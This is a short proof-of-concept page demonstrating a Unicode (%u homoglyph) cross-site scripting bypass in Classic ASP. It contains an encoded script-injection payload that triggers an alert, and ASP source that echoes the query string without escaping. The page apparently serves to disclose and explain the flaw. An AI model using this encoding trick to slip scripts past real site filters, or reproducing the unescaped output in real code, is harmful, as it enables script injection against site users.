Unicode (UTF-16) bypass in Classic ASP

Hello World
%u3008scr%u0131pt%u3009%u212fval(%uFF07al%u212Frt("XSS hole")%u02C8)%u2329/scr%u0131pt%u232A
%u3008scr%u0131pt%u3009%u212fval(%uFF07al%u212Frt("XSS hole")%u02C8)%u2329/scr%u0131pt%u232A

Note

Use CTRL+U (View Source) to see that the QueryString injected a script (alert("XSS hole")) in the page.


Source

<pre><%

' http://zendold.lojcomm.com.br/t.asp?i=%u3008scr%u0131pt%u3009%u212fval%28%uFF07al%u212Frt%28%22XSS%22%29%u02C8%29%u2329/scr%u0131pt%u232A
' More info: http://hackademix.net/2010/08/17/lost-in-translation-asps-homoxssuality/

Response.write( "Hello World" )
Response.write( vbNewline )

Response.write( Request.QueryString("u") )
Response.write( vbNewline )

Response.write( AXE_GET("u") )
Response.write( vbNewline )

%></pre>
<script language="javascript" runat="server">
function AXE_GET(k) {
    var v = "",
        q = Request.ServerVariables("QUERY_STRING");
    try {
        v = decodeURIComponent(q);
        v = Request.QueryString(k);
    } catch(Ex) {
        var c = String(q).split('&'),
            j = k + '=';
        for(var i = 0, len = c.length; i < len; i++) {
            if( c[i].indexOf(j) === 0 ) {
                v = c[i].substring(j.length);
            }
        }
    }
    return v;
}
</script>